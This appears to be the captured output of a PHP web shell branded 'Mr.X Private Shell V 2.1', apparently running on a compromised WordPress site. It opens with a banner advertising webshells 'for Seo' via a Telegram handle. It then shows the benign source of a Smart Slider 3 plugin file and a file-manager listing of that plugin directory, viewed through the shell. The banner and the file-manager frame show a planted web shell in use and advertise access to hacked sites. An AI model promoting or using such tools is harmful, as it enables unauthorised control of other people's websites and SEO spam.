__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Nextend\SmartSlider3\Application\Admin\Layout;
use Nextend\Framework\View\AbstractLayout;
use Nextend\SmartSlider3\Application\Admin\Layout\Block\Core\AdminError\BlockAdminError;
class LayoutError extends AbstractLayout {
protected $title, $content, $url = '';
/**
* Override to prevent backend JS load
*/
protected function enqueueAssets() {
}
public function setError($title, $content, $url = '') {
$this->title = $title;
$this->content = $content;
$this->url = $url;
}
public function render() {
$adminError = new BlockAdminError($this);
$adminError->setLayout($this);
$adminError->setError($this->title, $this->content, $this->url);
$adminError->display();
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Block | Folder | 0775 |
|
|
| Helper | Folder | 0775 |
|
|
| AbstractLayoutMenu.php | File | 2.13 KB | 0664 |
|
| LayoutDefault.php | File | 1007 B | 0664 |
|
| LayoutDefaultSidebar.php | File | 1.16 KB | 0664 |
|
| LayoutEditor.php | File | 1.55 KB | 0664 |
|
| LayoutEmpty.php | File | 390 B | 0664 |
|
| LayoutError.php | File | 796 B | 0664 |
|
| LayoutIframe.php | File | 881 B | 0664 |
|